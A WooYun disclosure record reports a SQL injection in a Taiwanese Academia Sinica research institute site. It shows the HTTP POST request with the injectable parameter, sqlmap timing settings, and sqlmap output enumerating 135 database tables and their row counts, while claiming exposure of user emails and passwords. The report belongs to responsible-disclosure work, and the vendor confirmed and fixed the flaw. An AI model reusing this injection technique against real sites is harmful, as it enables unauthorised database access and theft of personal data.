当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162795

漏洞标题:台灣中央研究院某研究所SQL注入漏洞(DBA權限/用戶郵箱/密碼等敏感信息洩露)(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-12-21 00:09

修复时间:2016-01-12 15:35

公开时间:2016-01-12 15:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-12: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

URL:**.**.**.**
台灣中央研究院國史研究所

站点.png


存在SQL注入漏洞

POST /publish-data_01_UP.php HTTP/1.1
Content-Length: 249
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=23ceae6af0c0411a6d42623df9b1917a
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ckUP_0=7851&ckUP_1=7849&ckUP_2=*&ckUP_3=7847&ckUP_4=7846&ckUP_5=7845&ckUP_6=7844&ckUP_7=7843&ckUP_8=7842&ckUP_9=7841


ckUP_2參數過濾不嚴,sqlmap驗證需要將time-sec設置為15秒,可UINON

注入证明.png


漏洞证明:

涉及4個庫

4个库.jpg


135個表
web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: ith
[135 tables]
+------------------------------+
| cast |
| year |
| acad_download |
| acad_faq |
| acad_meeting |
| acad_regisman |
| acad_regisshow |
| acad_registration |
| acad_vdeo |
| acad_vdeounit |
| academia |
| academic |
| affiche |
| affiche_download |
| animation |
| application_expendablet |
| appliesconference |
| article |
| article_add |
| article_purchase |
| bibl_cast |
| bibl_content |
| bibl_content_alerts |
| bibl_field |
| bibl_field_down |
| bibl_place |
| bibl_second |
| bibliography |
| bo_content |
| bo_download |
| boardroom |
| boffin |
| boondoggle |
| boondoggle_affiliate |
| cahier |
| cahier_bracket |
| code |
| code_bracket |
| contact |
| counter |
| counter1 |
| counter2 |
| display_calendar |
| display_carousel |
| display_information |
| display_seconds |
| download |
| download_unit |
| edition_group |
| file_achi |
| file_achi_dow |
| file_achi_layer |
| file_achi_layer_dow |
| file_awak |
| file_awak_dow |
| file_banner |
| file_calendar |
| file_coll |
| file_hist |
| file_hist_inst |
| file_hist_team |
| file_hist_type |
| file_inst |
| file_inst_coop |
| file_inst_hist |
| file_muse |
| file_muse_layer |
| file_reso |
| file_reso_dow |
| file_reso_layer |
| file_reso_layer_dow |
| file_reso_triplex |
| file_reso_triplex_dow |
| file_serv |
| file_serv_capt |
| file_serv_dow |
| file_spec |
| file_spec_layer |
| file_spec_triplex |
| file_visi |
| ifrm |
| ifrm1 |
| interent |
| interent_bracket |
| introduction |
| issue |
| lease |
| lease_class |
| lease_goods |
| manager |
| manager_unit |
| news |
| number |
| opening |
| place |
| quantity |
| quarterly |
| quarterly_bulletin |
| quarterly_committeeman |
| quarterly_contact |
| quarterly_magazine |
| quarterly_magazine_content |
| quarterly_new_content_alerts |
| quarterly_received |
| quarterly_subscribe |
| recording |
| research |
| research_affiliate |
| special |
| special_author |
| special_class |
| speinputs_inventory |
| speinputs_ordgup |
| speinputs_orlist |
| speinputs_purse |
| speinputs_sales |
| speinputs_sales_main |
| symp_acad_download |
| symp_acad_meeting |
| symp_acad_regisman |
| symp_acad_regisshow |
| symp_acad_registration |
| symp_academia |
| symp_agenda |
| symp_agendacom |
| symp_conpap |
| symp_conpapfile |
| symp_life |
| symp_life_album |
| symp_news |
| symp_origin |
| symp_participate |
| symp_website |
| working |
| working_download |
+------------------------------+
Database: ith
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| recording | 28844 |
| bibliography | 9463 |
| acad_regisshow | 8277 |
| acad_regisman | 7170 |
| appliesconference | 2250 |
| file_calendar | 2190 |
| symp_acad_regisshow | 933 |
| symp_acad_regisman | 819 |
| quarterly_magazine_content | 635 |
| affiche | 524 |
| affiche_download | 512 |
| academia | 483 |
| application_expendablet | 472 |
| bo_content | 451 |
| article_purchase | 423 |
| acad_meeting | 342 |
| number | 325 |
| bibl_second | 312 |
| display_calendar | 300 |
| contact | 298 |
| acad_registration | 297 |
| special_author | 273 |
| news | 247 |
| file_awak | 208 |
| manager | 183 |
| acad_download | 179 |
| file_spec_layer | 178 |
| speinputs_inventory | 175 |
| interent | 165 |
| boffin | 149 |
| special | 137 |
| quarterly_magazine | 122 |
| speinputs_purse | 111 |
| download | 95 |
| article | 77 |
| bibl_cast | 65 |
| bo_download | 63 |
| symp_conpapfile | 63 |
| article_add | 54 |
| display_information | 54 |
| quarterly_bulletin | 44 |
| file_spec | 41 |
| research_affiliate | 41 |
| lease_goods | 37 |
| lease | 34 |
| bibl_content_alerts | 29 |
| symp_life | 29 |
| special_class | 20 |
| bibl_field_down | 19 |
| file_banner | 19 |
| edition_group | 18 |
| symp_agendacom | 15 |
| symp_news | 15 |
| file_coll | 14 |
| file_hist | 14 |
| file_inst | 14 |
| manager_unit | 14 |
| file_hist_inst | 13 |
| file_inst_hist | 13 |
| file_serv | 13 |
| interent_bracket | 13 |
| opening | 13 |
| display_carousel | 12 |
| working_download | 12 |
| bibl_field | 11 |
| file_serv_dow | 11 |
| introduction | 11 |
| symp_acad_meeting | 11 |
| research | 10 |
| download_unit | 7 |
| symp_acad_download | 7 |
| symp_agenda | 7 |
| symp_conpap | 7 |
| academic | 6 |
| file_reso_triplex | 6 |
| file_spec_triplex | 6 |
| quantity | 6 |
| symp_acad_registration | 6 |
| file_inst_coop | 5 |
| ifrm | 5 |
| symp_academia | 5 |
| symp_life_album | 5 |
| symp_participate | 5 |
| symp_website | 5 |
| working | 5 |
| animation | 4 |
| file_hist_team | 4 |
| file_hist_type | 4 |
| lease_class | 4 |
| acad_faq | 3 |
| bibl_place | 3 |
| file_achi | 3 |
| file_muse | 3 |
| file_muse_layer | 3 |
| file_reso | 3 |
| file_reso_layer | 3 |
| file_serv_capt | 3 |
| file_visi | 3 |
| issue | 3 |
| place | 3 |
| quarterly | 3 |
| quarterly_committeeman | 3 |
| quarterly_contact | 3 |
| quarterly_received | 3 |
| quarterly_subscribe | 3 |
| symp_origin | 3 |
| `cast` | 2 |
| boardroom | 2 |
| speinputs_ordgup | 2 |
| `year` | 1 |
| bibl_content | 1 |
| code_bracket | 1 |
| counter | 1 |
| counter1 | 1 |
| counter2 | 1 |
| display_seconds | 1 |
| ifrm1 | 1 |
+----------------------------+---------+
涉及用戶敏感數據,密碼,郵箱等等

数据 (2).png

修复方案:

過濾參數

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-23 04:06

厂商回复:

感謝通報

最新状态:

2016-01-12:已修復